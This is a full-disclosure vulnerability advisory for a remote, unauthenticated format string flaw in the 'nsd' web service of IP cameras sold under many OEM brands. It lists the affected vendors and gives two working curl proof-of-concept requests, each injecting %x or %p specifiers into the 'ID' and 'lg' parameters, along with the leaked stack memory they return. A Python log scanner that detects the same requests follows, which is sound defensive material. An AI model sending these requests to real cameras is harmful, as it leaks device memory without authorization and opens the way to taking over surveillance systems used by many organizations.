[STX]

Subject: Remote Stack Format String in 'nsd' binary from multiple OEM
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 14, 2017
Full Disclosure: 0-Day

-[ PoC ]-

1)

$ curl 'http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB'
[...]
function initHideWidget(){
    document.getElementById("devip").value = "192.168.57.20";
    document.getElementById("cameraid").value = 1;
    document.getElementById("streamid").value = 1;
    document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069";
    document.getElementById("lg").value = "BBBB";
    document.getElementById("port").value = 60000;
    document.getElementById("ipver").value = 1;
    document.getElementById("tprotocol").value = 2;
    document.getElementById("devtype").value = 1;
    document.getElementById("ismotorize").value = 1;
[...]

Note: 'BBBB' are hiding within '5e3006db'

2)

curl -v "http://[IP:PORT]/Maintain/upgrade.asp?ID=|%p|%p|%p|%p|%p|%p"
[...]
function initHideWidget(){
    document.getElementById("ip").value = "192.168.57.20";
    document.getElementById("id").value = "|0x5d300484|0xffffffff|0xea60|0x1|0x2|0x1";
    document.getElementById("port").value = 60000;
    document.getElementById("ipver").value = 1;
    document.getElementById("tprotocol").value = 2;
    document.getElementById("devtype").value = 1;
[...]

-[ Affected OEM ]-

Huatu I-View IP Camera Web Service Stanley Security 3D Eyes CCTV Platform Protech Srl LS vision GWSECU 12 Legion Solution HDVuk IP Camera Intervid Security Suzuki Tech Wellsite IP Camera iBrido Protec IP Camera Maxtron IP Camera Ascendent GTvs IP Camera Squilla Bikal IP Camera MW Power Alfa Vision KMA Security Tough Dog Security Kpro HQ Lanetwork AFM Vision ZetaDo Jobsight Inc. Datalab IP Technologies 4Tvision Proline UK Tanz Aisonic HD-IP PreSec Security Solution EagleVision Elemis Delta Imenara Gigamedia Xavee Honeywell Boss Security A.R.T Surveillance Global Security Securicorp Securetech Vapplica Star Stic NeXus Alnet Spy Smart Kompsos Adler Security Systems Nextan Access Toprotect Kawah LS StrateX Senpei CCTV Metcom AFM Vision Doron Technologies Saviour Smart IoT Systems Eagle-Eye Faucon.at BlueEagle Security Campro Opple Level One Video and Monitor System K&D

[ETX]
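
A defender-side check for the two requests shown in the PoC section, as an added example that is not part of the original advisory: it scans web access logs for printf-style conversion specifiers in the 'ID' and 'lg' query parameters of those two paths. The log format, the sample lines and the case-insensitive matching are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Paths/parameters from the advisory's PoC requests; case-insensitive match is an assumption.
WATCHED = {"/main/index.asp": {"id", "lg"}, "/maintain/upgrade.asp": {"id"}}

# printf conversion specification: %[n$][flags][width][.precision][length]conv
FMT_SPEC = re.compile(
    r"%(?:\d+\$)?[-+ #0]*(?:\d+|\*)?(?:\.(?:\d+|\*))?"
    r"(?:hh|h|ll|l|j|z|t|L)?[diouxXeEfgGaAcspn]"
)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined-log style, documentation addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Dec/2017:10:00:01 +0000] '
    '"GET /main/index.asp?ID=AAAA|%x|%x|%x&lg=BBBB HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Dec/2017:10:00:09 +0000] '
    '"GET /Maintain/upgrade.asp?ID=|%25p|%25p HTTP/1.1" 200 4096',
    '192.0.2.10 - - [14/Dec/2017:10:01:30 +0000] '
    '"GET /main/index.asp?ID=1&lg=en HTTP/1.1" 200 5120',
]

def format_specs_in_request(target):
    """Return [(param, [specifiers])] for the watched parameters of one URL."""
    parts = urlsplit(target)
    watched = WATCHED.get(parts.path.lower(), set())
    hits = []
    # parse_qsl percent-decodes values, so an encoded "%25p" is seen as "%p";
    # a raw "%x" is not valid percent-encoding and passes through unchanged.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        specs = FMT_SPEC.findall(value)
        if name.lower() in watched and specs:
            hits.append((name, specs))
    return hits

def scan_access_log(lines):
    """Return (client, request target, hits) for every suspicious log line."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        hits = format_specs_in_request(match.group(1)) if match else []
        if hits:
            findings.append((line.split(" ", 1)[0], match.group(1), hits))
    return findings

if __name__ == "__main__":
    for client, target, hits in scan_access_log(SAMPLE_LOG):
        print(client, target, hits)
```

The check assumes a literal '%' is never expected in these two parameters, so any conversion specifier in them is treated as a finding.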